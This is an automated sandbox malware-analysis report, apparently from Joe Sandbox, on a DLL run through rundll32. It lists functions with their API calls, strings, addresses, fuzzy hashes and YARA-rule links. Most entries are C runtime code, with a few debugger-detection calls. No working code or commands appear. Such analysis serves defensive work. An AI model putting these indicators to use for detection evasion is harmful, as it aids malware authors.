Opcode Fuzzy Hash: f2c12f49fb29a569ff18aca5e70d8c75ca036acde406f752c81c356fd297c989
Instruction Fuzzy Hash: 7E61D57190912C9FDF209F288D88BFABBF8AF05308FA441D9D05C97640EB31AE948F10

Function 6C059820 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 6C059918
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 6C059922
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 6C05992F

Strings

NKxo, xrefs: 6C05982B

Memory Dump Source

Source File: 0000000C.00000002.2924991559.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true

Associated: 0000000C.00000002.2924945917.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.2925057270.000000006C066000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.2925098569.000000006C06E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.2925131103.000000006C070000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6c050000_rundll32.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID: NKxo
API String ID: 3906539128-1440849049
Opcode ID: 671e7f98fa6128f94c012caa7c788f6e4dd5a5b2814a13e62f73c9d1b9eb97bb
Instruction ID: c4610e15d5ce614bcad3cec24a9087cc245aadc3c2ba01fe46b6b5d64678c5b3
Opcode Fuzzy Hash: 671e7f98fa6128f94c012caa7c788f6e4dd5a5b2814a13e62f73c9d1b9eb97bb
Instruction Fuzzy Hash: 1B31E5B4901218ABCF21DF29C9887DDBBF8BF08314F5041EAE41CA7250EB749B958F44

Function 6C057288 Relevance: 6.1, APIs: 4, Instructions: 73COMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 6C057294
IsDebuggerPresent.KERNEL32 ref: 6C057360
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6C057380
UnhandledExceptionFilter.KERNEL32(?), ref: 6C05738A

Memory Dump Source

Source File: 0000000C.00000002.2924991559.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true

Associated: 0000000C.00000002.2924945917.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.2925057270.000000006C066000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.2925098569.000000006C06E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.2925131103.000000006C070000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6c050000_rundll32.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 634b7658188c79883c6485a2dd32c89dcd26e5cbfef29946141a9a94530afee1
Instruction ID: 439036fd75603c5463d0526979f9faac43fb9b0f9354ce6a76fde8403766c2dd
Opcode Fuzzy Hash: 634b7658188c79883c6485a2dd32c89dcd26e5cbfef29946141a9a94530afee1
Instruction Fuzzy Hash: 223129B5D15218DBDF10DFA5CA897CDBBF8AF08304F5041EAE54DAB240EB745A889F44

Function 6C05DDF0 Relevance: 19.6, APIs: 13, Instructions: 113
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

___free_lconv_mon.LIBCMT ref: 6C05DE34

Part of subcall function 6C05E230: _free.LIBCMT ref: 6C05E24D
Part of subcall function 6C05E230: _free.LIBCMT ref: 6C05E25F
Part of subcall function 6C05E230: _free.LIBCMT ref: 6C05E271
Part of subcall function 6C05E230: _free.LIBCMT ref: 6C05E283
Part of subcall function 6C05E230: _free.LIBCMT ref: 6C05E295
Part of subcall function 6C05E230: _free.LIBCMT ref: 6C05E2A7
Part of subcall function 6C05E230: _free.LIBCMT ref: 6C05E2B9
Part of subcall function 6C05E230: _free.LIBCMT ref: 6C05E2CB
Part of subcall function 6C05E230: _free.LIBCMT ref: 6C05E2DD
Part of subcall function 6C05E230: _free.LIBCMT ref: 6C05E2EF
Part of subcall function 6C05E230: _free.LIBCMT ref: 6C05E301
Part of subcall function 6C05E230: _free.LIBCMT ref: 6C05E313
Part of subcall function 6C05E230: _free.LIBCMT ref: 6C05E325

_free.LIBCMT ref: 6C05DE29

Part of subcall function 6C05B90F: HeapFree.KERNEL32(00000000,00000000,?,6C05AB0E), ref: 6C05B925
Part of subcall function 6C05B90F: GetLastError.KERNEL32(?,?,6C05AB0E), ref: 6C05B937

_free.LIBCMT ref: 6C05DE4B
_free.LIBCMT ref: 6C05DE60
_free.LIBCMT ref: 6C05DE6B
_free.LIBCMT ref: 6C05DE8D
_free.LIBCMT ref: 6C05DEA0
_free.LIBCMT ref: 6C05DEAE
_free.LIBCMT ref: 6C05DEB9
_free.LIBCMT ref: 6C05DEF1
_free.LIBCMT ref: 6C05DEF8
_free.LIBCMT ref: 6C05DF15
_free.LIBCMT ref: 6C05DF2D

Memory Dump Source

Source File: 0000000C.00000002.2924991559.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true

Associated: 0000000C.00000002.2924945917.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.2925057270.000000006C066000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.2925098569.000000006C06E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.2925131103.000000006C070000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6c050000_rundll32.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 60e546477583f6a47f5a6559fb70d902c250ccded5a2ac8741081b6580a820b2
Instruction ID: 10841c0c05855900f84106b1dc7abf5e069492c214d2514c7470d8bf96061a55
Opcode Fuzzy Hash: 60e546477583f6a47f5a6559fb70d902c250ccded5a2ac8741081b6580a820b2
Instruction Fuzzy Hash: 1A3161716047099FEB116E35DB44B8673E9EF01358FA4581AE0A5D7A90DF31FA74C710

Function 6C0582C0 Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 304
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

IsInExceptionSpec.LIBVCRUNTIME ref: 6C0583BD
type_info::operator==.LIBVCRUNTIME ref: 6C0583DF
___TypeMatch.LIBVCRUNTIME ref: 6C0584EE
IsInExceptionSpec.LIBVCRUNTIME ref: 6C0585C0
_UnwindNestedFrames.LIBCMT ref: 6C058644
CallUnexpected.LIBVCRUNTIME ref: 6C05865F

Strings

csm, xrefs: 6C058416
csm, xrefs: 6C05836A
csm, xrefs: 6C0582FD

Memory Dump Source

Source File: 0000000C.00000002.2924991559.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true

Associated: 0000000C.00000002.2924945917.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.2925057270.000000006C066000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.2925098569.000000006C06E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.2925131103.000000006C070000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6c050000_rundll32.jbxd

Similarity

API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 2123188842-393685449
Opcode ID: 35a48633a2db8d5f02f497e739a6e476cfb0d8e5d7a6fe4e1a3ab27897c4a337
Instruction ID: 89de76987aae5df4f610aed35adaceb06512dc55b00f075851d79ce407a7eb3f
Opcode Fuzzy Hash: 35a48633a2db8d5f02f497e739a6e476cfb0d8e5d7a6fe4e1a3ab27897c4a337
Instruction Fuzzy Hash: 67B18B71861209DFCF05CFA5CA80A9EBBF5FF04318B94425AEC116BA15D331EA62CF91

Function 6C05B188 Relevance: 15.1, APIs: 10, Instructions: 69
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_free.LIBCMT ref: 6C05B19E

Part of subcall function 6C05B90F: HeapFree.KERNEL32(00000000,00000000,?,6C05AB0E), ref: 6C05B925
Part of subcall function 6C05B90F: GetLastError.KERNEL32(?,?,6C05AB0E), ref: 6C05B937

_free.LIBCMT ref: 6C05B1AA
_free.LIBCMT ref: 6C05B1B5
_free.LIBCMT ref: 6C05B1C0
_free.LIBCMT ref: 6C05B1CB
_free.LIBCMT ref: 6C05B1D6
_free.LIBCMT ref: 6C05B1E1
_free.LIBCMT ref: 6C05B1EC
_free.LIBCMT ref: 6C05B1F7
_free.LIBCMT ref: 6C05B205

Memory Dump Source

Source File: 0000000C.00000002.2924991559.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true

Associated: 0000000C.00000002.2924945917.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.2925057270.000000006C066000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.2925098569.000000006C06E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.2925131103.000000006C070000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6c050000_rundll32.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 28ba4f15bc1d4b25d6db99ee8f6395d3e2d68f0411b8dd74a14b8c903cb14301
Instruction ID: 4a79ccf8d87a1cb5af313039b0f5c153d5d7d5b11384042e33a68e9a6b49f263
Opcode Fuzzy Hash: 28ba4f15bc1d4b25d6db99ee8f6395d3e2d68f0411b8dd74a14b8c903cb14301
Instruction Fuzzy Hash: D02197B690450CAFCB41EF94C984EDE7BF9BF08244F4141A6E5559B621DB31FB58CB80

Function 6C05F25C Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 317
fileCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetConsoleOutputCP.KERNEL32(?,00000001,?), ref: 6C05F2A4
__fassign.LIBCMT ref: 6C05F489
__fassign.LIBCMT ref: 6C05F4A6
WriteFile.KERNEL32(?,6C05D927,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C05F4EE
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6C05F52E
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C05F5D6

Strings

NKxo, xrefs: 6C05F267

Memory Dump Source

Source File: 0000000C.00000002.2924991559.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true

Associated: 0000000C.00000002.2924945917.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.2925057270.000000006C066000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.2925098569.000000006C06E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.2925131103.000000006C070000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6c050000_rundll32.jbxd

Similarity

API ID: FileWrite__fassign$ConsoleErrorLastOutput
String ID: NKxo
API String ID: 1735259414-1440849049
Opcode ID: 1756e46eca4a80d17d058a9eb495a5905c5588e79ccbd7b339931493f3203ed2
Instruction ID: ae6fd99980a85a14b7318ecfc8c6dcb2257c4fd6a3bd92ed52b2c9ea059b1c1b
Opcode Fuzzy Hash: 1756e46eca4a80d17d058a9eb495a5905c5588e79ccbd7b339931493f3203ed2
Instruction Fuzzy Hash: 99C1BE71D052588FCF00CFA8C980AEDBBF9AF09314F68416AE855F7741D635AA16CF50

Function 6C057C10 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 122
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_ValidateLocalCookies.LIBCMT ref: 6C057C47
___except_validate_context_record.LIBVCRUNTIME ref: 6C057C4F
_ValidateLocalCookies.LIBCMT ref: 6C057CD8
__IsNonwritableInCurrentImage.LIBCMT ref: 6C057D03
_ValidateLocalCookies.LIBCMT ref: 6C057D58

Strings

csm, xrefs: 6C057CED
NKxo, xrefs: 6C057CC2, 6C057D3F

Memory Dump Source

Source File: 0000000C.00000002.2924991559.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true

Associated: 0000000C.00000002.2924945917.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.2925057270.000000006C066000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.2925098569.000000006C06E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.2925131103.000000006C070000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6c050000_rundll32.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: NKxo$csm
API String ID: 1170836740-3529511991
Opcode ID: c24e4de6dd0c11554c692ad67df8cec8a7fdd28de7a4c8742048d61afb824e1f
Instruction ID: 9228a8e05f12e51ed0e51fd32d516e5e684d883104f025b40e19a6112b2a04c7
Opcode Fuzzy Hash: c24e4de6dd0c11554c692ad67df8cec8a7fdd28de7a4c8742048d61afb824e1f
Instruction Fuzzy Hash: BE41A234A102189BCF10CF6DC944B9E7BF5BF45318F90C199EC189BB51D732AA65CB90

Function 6C05CE36 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

Strings

ext-ms-, xrefs: 6C05CEA1
api-ms-, xrefs: 6C05CE8D

Memory Dump Source

Source File: 0000000C.00000002.2924991559.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true

Associated: 0000000C.00000002.2924945917.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.2925057270.000000006C066000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.2925098569.000000006C06E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.2925131103.000000006C070000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6c050000_rundll32.jbxd

Similarity

API ID:
String ID: api-ms-$ext-ms-
API String ID: 0-537541572
Opcode ID: 5122906abe263107e5f716cc2f77052e1e8382607f90bffbe786ee678f1005da
Instruction ID: 702a23165547357fc031e2f5f0e74b90752aac1898af76859f3713736955183e
Opcode Fuzzy Hash: 5122906abe263107e5f716cc2f77052e1e8382607f90bffbe786ee678f1005da
Instruction Fuzzy Hash: 2E21EE72B45210B7DB11AE6A8E40B5B37F89F0A7A4FB50514E855E7A80D731ED10C6E0

Function 6C05E3CF Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 6C05E397: _free.LIBCMT ref: 6C05E3BC

_free.LIBCMT ref: 6C05E41D

Part of subcall function 6C05B90F: HeapFree.KERNEL32(00000000,00000000,?,6C05AB0E), ref: 6C05B925
Part of subcall function 6C05B90F: GetLastError.KERNEL32(?,?,6C05AB0E), ref: 6C05B937

_free.LIBCMT ref: 6C05E428
_free.LIBCMT ref: 6C05E433
_free.LIBCMT ref: 6C05E487
_free.LIBCMT ref: 6C05E492
_free.LIBCMT ref: 6C05E49D
_free.LIBCMT ref: 6C05E4A8

Memory Dump Source

Source File: 0000000C.00000002.2924991559.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true

Associated: 0000000C.00000002.2924945917.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.2925057270.000000006C066000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.2925098569.000000006C06E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.2925131103.000000006C070000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6c050000_rundll32.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 721850df8d4c47503c6824c909b1dca4e5bf9ba2e63f805735e24cd8dbef12be
Instruction ID: fb6e2cb3438e71cbef368ceaeadc540d5c186cb5cd8373d3d940bb4fd45f76fe
Opcode Fuzzy Hash: 721850df8d4c47503c6824c909b1dca4e5bf9ba2e63f805735e24cd8dbef12be
Instruction Fuzzy Hash: 6711E272544F0CA7D620AF70CE49FCB7FDC5F04704F804819A2E9A7B91D7A9F6284694

Function 6C057F89 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(00000001,?,6C057B9E,6C0568B4,6C056D4B,?,6C056F85,?,00000001,?,?,00000001,?,6C06C7F8,0000000C,6C05707E), ref: 6C057F97
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6C057FA5
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6C057FBE
SetLastError.KERNEL32(00000000,6C056F85,?,00000001,?,?,00000001,?,6C06C7F8,0000000C,6C05707E,?,00000001,?), ref: 6C058010

Memory Dump Source

Source File: 0000000C.00000002.2924991559.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true

Associated: 0000000C.00000002.2924945917.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.2925057270.000000006C066000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.2925098569.000000006C06E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.2925131103.000000006C070000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6c050000_rundll32.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: c436e1827c46706972d547a0cdd4fc9fe3ff80abef4a87d82d238063945f9f2d
Instruction ID: 882dc6b0aef55ec3cd6c58fb5fa9fb90a1a1ddb2a6c073649d839f1665261d59
Opcode Fuzzy Hash: c436e1827c46706972d547a0cdd4fc9fe3ff80abef4a87d82d238063945f9f2d
Instruction Fuzzy Hash: 91012D7235D3216FBA1119BA5E887A737E8D74277D3A0072AF570869D0EF125836B290

Function 6C05C17B Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83COMMON

Download Yara Rule

Strings

C:\Windows\SysWOW64\rundll32.exe, xrefs: 6C05C180

Memory Dump Source

Source File: 0000000C.00000002.2924991559.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true

Associated: 0000000C.00000002.2924945917.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.2925057270.000000006C066000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.2925098569.000000006C06E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.2925131103.000000006C070000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6c050000_rundll32.jbxd

Similarity

API ID:
String ID: C:\Windows\SysWOW64\rundll32.exe
API String ID: 0-2837366778
Opcode ID: 1c6b6f2989f685d138422c71c55d54b46b58d8f7dc046ddf45b6f907ce392570
Instruction ID: 1d1e7c2d131434a217d9041e03493cd7238d5cdb3f1fee0936d489dc2ee19d61
Opcode Fuzzy Hash: 1c6b6f2989f685d138422c71c55d54b46b58d8f7dc046ddf45b6f907ce392570
Instruction Fuzzy Hash: 1521C571204105AF9B10AEA68E80F5B77ECAF0976C7944615F924D7A80EB34EC3087A0

Function 6C058FF7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,?,6C0590B8,00000000,?,00000001,00000000,?,6C05912F,00000001,FlsFree,6C066E3C,FlsFree,00000000), ref: 6C059087

Strings

api-ms-, xrefs: 6C059047

Memory Dump Source

Source File: 0000000C.00000002.2924991559.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true

Associated: 0000000C.00000002.2924945917.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.2925057270.000000006C066000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.2925098569.000000006C06E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.2925131103.000000006C070000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6c050000_rundll32.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-
API String ID: 3664257935-2084034818
Opcode ID: 58a50e94a476bf201b931ee8d8df2d6e2c4d0284213e051e4eb1edde42342b24
Instruction ID: f38f8cebe31bcfafae358f61738748be24c080078cc46010d88fd1d517adc2e9
Opcode Fuzzy Hash: 58a50e94a476bf201b931ee8d8df2d6e2c4d0284213e051e4eb1edde42342b24
Instruction Fuzzy Hash: 0011CAB1B45120AFDF124FA9CD4475E33F4AF037B4F650620E951E7680DB72E91186E1

Function 6C05A2D9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,6C05A28B,?,?,6C05A253,?,00000001,?), ref: 6C05A2EE
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6C05A301
FreeLibrary.KERNEL32(00000000,?,?,6C05A28B,?,?,6C05A253,?,00000001,?), ref: 6C05A324

Strings

CorExitProcess, xrefs: 6C05A2F9
mscoree.dll, xrefs: 6C05A2E7

Memory Dump Source

Source File: 0000000C.00000002.2924991559.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true

Associated: 0000000C.00000002.2924945917.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.2925057270.000000006C066000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.2925098569.000000006C06E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.2925131103.000000006C070000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6c050000_rundll32.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 484a5793d03a4e14712f3b04c83c838e0641d3fe950af2e710f105f5a6e9796e
Instruction ID: 916c8870500a69b4d08124208aa1d05913f3cd96b59e7b9aceaf3e954edab786
Opcode Fuzzy Hash: 484a5793d03a4e14712f3b04c83c838e0641d3fe950af2e710f105f5a6e9796e
Instruction Fuzzy Hash: E4F03031A16618FBEF019F92DD09BAE7AF9EF4175AF604064F405E2551CF328E10DBA1

Function 6C05E32E Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 6C05E346

Part of subcall function 6C05B90F: HeapFree.KERNEL32(00000000,00000000,?,6C05AB0E), ref: 6C05B925
Part of subcall function 6C05B90F: GetLastError.KERNEL32(?,?,6C05AB0E), ref: 6C05B937

_free.LIBCMT ref: 6C05E358
_free.LIBCMT ref: 6C05E36A
_free.LIBCMT ref: 6C05E37C
_free.LIBCMT ref: 6C05E38E

Memory Dump Source

Source File: 0000000C.00000002.2924991559.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true

Associated: 0000000C.00000002.2924945917.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.2925057270.000000006C066000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.2925098569.000000006C06E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.2925131103.000000006C070000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6c050000_rundll32.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 7e5b10e4b8f23e8370db3420bcd510076d0f0375c50b2966e941a33bc3a0d888
Instruction ID: ee9ebdc6f2525ede5dd48b2e7ecf040729fc94b167d8a40db1a8a12881d759e3
Opcode Fuzzy Hash: 7e5b10e4b8f23e8370db3420bcd510076d0f0375c50b2966e941a33bc3a0d888
Instruction Fuzzy Hash: AFF0FF7150970C57CB10EE59E6C9F5A77EDAB017587E42805F074D7B40CB34FAA08AD4

Function 6C05EB54 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 199COMMON

Download Yara Rule

APIs

__freea.LIBCMT ref: 6C05ED0A

Part of subcall function 6C05B833: HeapAlloc.KERNEL32(00000000,00013385,00013385,?,6C05C6BF,00000220,6C05F2B8,00013385,?,?,?,?,00000000,00000000,?,6C05F2B8), ref: 6C05B865

__freea.LIBCMT ref: 6C05ED13
__freea.LIBCMT ref: 6C05ED36

Strings

NKxo, xrefs: 6C05EB5B

Memory Dump Source

Source File: 0000000C.00000002.2924991559.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true

Associated: 0000000C.00000002.2924945917.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.2925057270.000000006C066000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.2925098569.000000006C06E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.2925131103.000000006C070000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6c050000_rundll32.jbxd

Similarity

API ID: __freea$AllocHeap
String ID: NKxo
API String ID: 85559729-1440849049
Opcode ID: 6edbc78a1c6e7392122ff51add9e9a6e00d717d9a3ec8e2623f9de8ee366c55c
Instruction ID: 31d630c1664595b2f86292198acb4f71758b08751181635c212e0d357b307a5b
Opcode Fuzzy Hash: 6edbc78a1c6e7392122ff51add9e9a6e00d717d9a3ec8e2623f9de8ee366c55c
Instruction Fuzzy Hash: D951D172600216ABEF144E658E44FAB3AE9EB44718FA50529FD6497A40E739EC2186E0

Function 6C05C27D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 6C05C2A2
GetLastError.KERNEL32 ref: 6C05C2AC
__dosmaperr.LIBCMT ref: 6C05C2B3

Strings

NKxo, xrefs: 6C05C288

Memory Dump Source

Source File: 0000000C.00000002.2924991559.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true

Associated: 0000000C.00000002.2924945917.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.2925057270.000000006C066000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.2925098569.000000006C06E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.2925131103.000000006C070000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6c050000_rundll32.jbxd

Similarity

API ID: ErrorFileLastModuleName__dosmaperr
String ID: NKxo
API String ID: 4076908705-1440849049
Opcode ID: 70ef6246e64ce7519a92704dc2a85a8320d5e0cd3bf1f54ab2c6e47ad903420b
Instruction ID: ce98aab6f86e591e16134a6444aa1940e9f40b03b6c84ebb3e81165c9dde1c23
Opcode Fuzzy Hash: 70ef6246e64ce7519a92704dc2a85a8320d5e0cd3bf1f54ab2c6e47ad903420b
Instruction Fuzzy Hash: BD111BB194421CAFDF10DFA5DD88BDE77F8AB08304F504599E509E7240DB74AA988F54

Function 6C058069 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 6C058130
___AdjustPointer.LIBCMT ref: 6C058153
___AdjustPointer.LIBCMT ref: 6C0581EF

Memory Dump Source

Source File: 0000000C.00000002.2924991559.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true

Associated: 0000000C.00000002.2924945917.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.2925057270.000000006C066000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.2925098569.000000006C06E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.2925131103.000000006C070000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6c050000_rundll32.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
